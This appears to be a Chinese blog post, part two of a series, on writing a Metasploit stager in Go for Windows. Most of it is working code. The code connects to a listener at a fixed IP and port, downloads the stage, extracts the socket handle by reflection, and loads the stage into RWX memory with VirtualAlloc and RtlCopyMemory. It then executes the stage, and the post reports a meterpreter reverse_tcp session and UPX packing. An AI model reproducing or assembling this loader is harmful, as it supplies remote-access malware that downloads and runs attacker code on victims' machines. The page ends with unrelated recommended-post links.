采用 Golang 开发stagers

上一篇文章 msf stagers开发不完全指北(一)中我们谈到如何采用 c 进行 msf 的 stagers 开发,这篇文章我们探讨一下如何使用 Golang 实现同样的功能

思路梳理

在 Golang 中一点比较重要的是,我们如何能够获取到 socket 的文件描述符,除此之外,我们还是同样的步骤

  1. 向 msf 监听地址发起 tcp 请求
  2. 获取 stages
  3. 将 socket fd 放入寄存器 edi
  4. 从起始地址开始执行 stages

编译环境

  • OS: Windows 10

  • Golang: go version go1.14.1 windows/amd64

获取stages

socket, err := net.Dial("tcp", "192.168.174.136:4444")

if err != nil {

    return err

}

// read payload size

var payloadSizeRaw = make([]byte, 4)

numOfBytes, err := socket.Read(payloadSizeRaw)

if err != nil {

	return err

}

if numOfBytes != 4 {

    return errors.New("Number of size bytes was not 4! ")

}

payloadSize := int(binary.LittleEndian.Uint32(payloadSizeRaw))

// read payload

var payload = make([]byte, payloadSize)

// numOfBytes, err = socket.Read(payload)

numOfBytes, err = io.ReadFull(socket, payload)

if err != nil {

    return err

}

if numOfBytes != payloadSize {

    return errors.New("Number of payload bytes does not match payload size! ")

}

这里有几点我们需要注意的地方,第一是读取stages长度是需要使用 binary 库把它转化为 int32,你可以理解为 python 中的 struct 库,第二个是我们惯用的从 socket 连接读取数据使用的是 Read,但是并不能读全,和网络有关系,需要使用 ReadFull 或者 ReadAtLeast 进行读取。读取到 stages 后,我们可以进行下一步操作了。

socket fd 放入 edi

conn := socket.(*net.TCPConn)

fd := reflect.ValueOf(*conn).FieldByName("fd")

handle := reflect.Indirect(fd).FieldByName("pfd").FieldByName("Sysfd")

socketFd := *(*uint32)(unsafe.Pointer(handle.UnsafeAddr()))

buff := make([]byte, 4)

binary.LittleEndian.PutUint32(buff, socketFd)

return buff

这部分代码就是我上面所说的难点了,首先 socket, err := net.Dial("tcp", "192.168.174.136:4444") 返回的是一个接口 type Conn interface ,我们需要找到他的真实类型,继续往里面跟我们会发现他的真实类型是 *net.TCPConn,为什么要做这一步?

我们先看看这个结构体

// TCPConn is an implementation of the Conn interface for TCP network

// connections.

type TCPConn struct {

	conn

}

type conn struct {

	fd *netFD

}

我们其实需要的是里面的文件描述符,我们再往里跟一下

// Network file descriptor.

type netFD struct {

	pfd poll.FD

	// immutable until Close

	family      int

	sotype      int

	isConnected bool // handshake completed or use of association with peer

	net         string

	laddr       Addr

	raddr       Addr

}

// poll.FD

// FD is a file descriptor. The net and os packages embed this type in

// a larger type representing a network connection or OS file.

type FD struct {

	// Lock sysfd and serialize access to Read and Write methods.

	fdmu fdMutex

	// System file descriptor. Immutable until Close.

	Sysfd syscall.Handle

	// Read operation.

	rop operation

	// Write operation.

	wop operation

	// I/O poller.

	pd pollDesc

	// Used to implement pread/pwrite.

	l sync.Mutex

	// For console I/O.

	lastbits       []byte   // first few bytes of the last incomplete rune in last write

	readuint16     []uint16 // buffer to hold uint16s obtained with ReadConsole

	readbyte       []byte   // buffer to hold decoding of readuint16 from utf16 to utf8

	readbyteOffset int      // readbyte[readOffset:] is yet to be consumed with file.Read

	// Semaphore signaled when file is closed.

	csema uint32

	skipSyncNotif bool

	// Whether this is a streaming descriptor, as opposed to a

	// packet-based descriptor like a UDP socket.

	IsStream bool

	// Whether a zero byte read indicates EOF. This is false for a

	// message based socket connection.

	ZeroReadIsEOF bool

	// Whether this is a file rather than a network socket.

	isFile bool

	// The kind of this file.

	kind fileKind

}

可以看到 Sysfd 是文件描述符,也就是我们想要的,我们需要取一下,这里因为 Golang 里面小写开头的字段是不导出的,我们需要使用反射取一下

注意:可能因为 Golang 版本不一致,这个结构有所更改,请自行考证一下,主要原因是非导出字段,官方是不保证向下兼容性的

所以获取文件描述符的代码就是

fd := reflect.ValueOf(*conn).FieldByName("fd")

handle := reflect.Indirect(fd).FieldByName("pfd").FieldByName("Sysfd")

socketFd := *(*uint32)(unsafe.Pointer(handle.UnsafeAddr()))

文件描述符是 handle 所指向的值,这里需要注意一下

然后后面的还是我们之前的操作,使用 binary 包把 uint32 转为 4bytes 数组

然后我们需要把 socket fd 放入 edi

payload = append(append([]byte{0xBF}, socketFD...), payload...)

mov edi, xxxx 放到了 stages 头部

执行stages

一切的准备工作都做完了,下面就是开始准备执行了,类似执行 shellcode 的方式,这里的实现方式八仙过海各显神通了,我这里只给我我这里的实现方式

// modify payload to comply with the plan9 calling convention

payload = append(

    []byte{0x50, 0x51, 0x52, 0x53, 0x56, 0x57},

    append(

        payload,

        []byte{0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3}...,

    )...,

)

addr, _, err := virtualAlloc.Call(0, uintptr(len(payload)), 0x1000|0x2000, 0x40)

if addr == 0 {

    return err

}

RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&payload[0])), uintptr(len(payload)))

syscall.Syscall(address, 0, 0, 0, 0)

这里的一串奇奇怪怪的字符可以不用加,只是为了遵守 plan9 汇编的调用约定,一些 push 保存堆栈现场和 pop 还原

然后就是先通过申请 VirtualAlloc 一块可读可写可执行的内存,然后使用 RtlCopyMemory 把 stages 字节码拷贝进去,然后开始跑。

这里的 windows api 使用的声明如下

var (

	kernel32      = syscall.MustLoadDLL("kernel32.dll")

	ntdll         = syscall.MustLoadDLL("ntdll.dll")

	virtualAlloc  = kernel32.MustFindProc("VirtualAlloc")

	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")

)

这里其实你也可以使用 x/windows 库方便使用。

结果展示

64位编译出来 1.73M,通过 upx 压缩后 616kb,32位编译出来会更小

执行试试

监听 payload windows/x64/meterpreter/reverse_tcp ,可以看到成功上线

注意事项

  • 可能因为 Golang 版本不一致,这个结构有所更改,请自行考证一下,主要原因是非导出字段,官方是不保证向下兼容性的
  • 依然需要注意位数的差异,比如32位的payload请使用32位编译,64位payload使用64位编译

成果源码

成果源码我就不贴出来了,其实也是这些代码组合在一起

msf stagers开发不完全指北(二)的更多相关文章

  1. msf stagers开发不完全指北(一)

    采用c开发stagers 前言 之前有写过一篇 metasploit payload运行原理浅析(sockedi调用约定是什么),里面有提到以后了解这些东西后可以做的事情,其实包括但不限于自写stag ...

  2. msf stagers开发不完全指北(四): msf 中使用域前置技术隐藏流量

    msf 中使用域前置技术隐藏流量 前几篇都是说了下如何采用不同的语言开发 reverse_tcp 第二阶段,接下来将慢慢分析 reverse_http,这篇文章并不会围绕 stagers 进行讲解,这 ...

  3. Python 简单入门指北(二)

    Python 简单入门指北(二) 2 函数 2.1 函数是一等公民 一等公民指的是 Python 的函数能够动态创建,能赋值给别的变量,能作为参传给函数,也能作为函数的返回值.总而言之,函数和普通变量 ...

  4. 微信小程序云开发不完全指北

    微信小程序云开发不完全指北 首先必须说明云开发的"云"并不是类似云玩家里的云的意思,而是微信小程序真的提供了云开发的接口以及一个简单的提供存储.数据库服务的虚拟后台(对于一些轻量小 ...

  5. ansible使用指北(二)

    前言在上一篇文章里我们了解了ansible的常用模块,今天我们来了解下ansible-playbook,ansbile-playbook是一系统ansible命令的集合,其利用yaml 语言编写,an ...

  6. .NET 跨平台框架Avalonia UI: 填坑指北(二):在Linux上跑起来了

    上一章回顾:  .NET 跨平台框架Avalonia UI: 填坑指北(一):熟悉UI操作 本篇将要阐述 包括但不仅限于Avalonia及所有Windows到Linux跨平台开发 的一些注意事项: 一 ...

  7. 可能比文档还详细--VueRouter完全指北

    可能比文档还详细--VueRouter完全指北 前言 关于标题,应该算不上是标题党,因为内容真的很多很长很全面.主要是在官网的基础上又详细总结,举例了很多东西.确保所有新人都能理解!所以实际上很多东西 ...

  8. ThinkPHP 3.2.x 集成极光推送指北

    3.2版本已经过了维护生命周期,官方已经不再维护,请及时更新至5.0版本 -- ThinkPHP 官方仓库 以上,如果有条件,请关闭这个页面,然后升级至 ThinkPHP 5,如果由于各种各样的原因无 ...

  9. c#封装DBHelper类 c# 图片加水印 (摘)C#生成随机数的三种方法 使用LINQ、Lambda 表达式 、委托快速比较两个集合,找出需要新增、修改、删除的对象 c# 制作正方形图片 JavaScript 事件循环及异步原理(完全指北)

    c#封装DBHelper类   public enum EffentNextType { /// <summary> /// 对其他语句无任何影响 /// </summary> ...

随机推荐

  1. dell5460笔记本电脑ubuntu18.04系统音频驱动的安装和使用

    一.背景: 近期使用dell5460笔记本在ubuntu系统下观看视频,发现没有声音,考虑安装音频驱动. 二.音频驱动的安装 linux系统的音频驱动基于ALSA(即Advanced Linux So ...

  2. DFA最小化

    1.将DFA最小化:教材P65 第9题 2.构造以下文法相应的最小的DFA S→ 0A|1B A→ 1S|1 B→0S|0 3.自上而下语法分析,回溯产生的原因是什么? 文法中,对于某个非终结符号的规 ...

  3. Java实现 LeetCode 731 我的日程安排表 II(二叉树)

    731. 我的日程安排表 II 实现一个 MyCalendar 类来存放你的日程安排.如果要添加的时间内不会导致三重预订时,则可以存储这个新的日程安排. MyCalendar 有一个 book(int ...

  4. Java实现 LeetCode 396 旋转函数

    396. 旋转函数 给定一个长度为 n 的整数数组 A . 假设 Bk 是数组 A 顺时针旋转 k 个位置后的数组,我们定义 A 的"旋转函数" F 为: F(k) = 0 * B ...

  5. Java实现 蓝桥杯VIP 算法训练 猴子分苹果

    问题描述 秋天到了,n只猴子采摘了一大堆苹果放到山洞里,约定第二天平分.这些猴子很崇拜猴王孙悟空,所以都想给他留一些苹果.第一只猴子悄悄来到山洞,把苹果平均分成n份,把剩下的m个苹果吃了,然后藏起来一 ...

  6. java实现第五届蓝桥杯扑克序列

    扑克序列 AA223344,一共4对扑克牌.请你把它们排成一行. 要求:两个A中间有1张牌,两个2之间有2张牌,两个3之间有3张牌,两个4之间有4张牌. 4A3A2432, 2342A3A4 请填写出 ...

  7. Linux 日志轮替

    日志轮替包括两个方面的内容:切割日志文件,轮换日志文件 日志文件的命令规则 如果配置文件中有dateext参数,那么日志文件的后缀会是日期,例如:yum.log-20200424,这样,文件名不会重叠 ...

  8. Oracle RMAN各类压缩算法对比测试

    1.背景概述 2.本次测试环境基本信息 3.测试步骤 3.1. 使用BCO进行压缩备份 3.2. 不使用压缩备份 3.3. 使用ACO中LOW级别进行压缩备份 3.4. 使用ACO中MEDIUM级别进 ...

  9. session共享同步redis策略

    关于session共享的文章,网上很多,可是最关键的点我没有看到一篇.也就是session对象到底是怎么同步到redis的. spring-session底层原理到底是怎么样的一个同步更新策略,我没有 ...

  10. Java使用 Thumbnails 压缩图片

    业务:用户上传一张图片到文件站,需要返回原图url和缩略图url 处理思路: 因为上传图片方法返回url是单个上传,第一步先上传原图并返回url 处理缩略图并上传:拿到MultipartFile压缩成 ...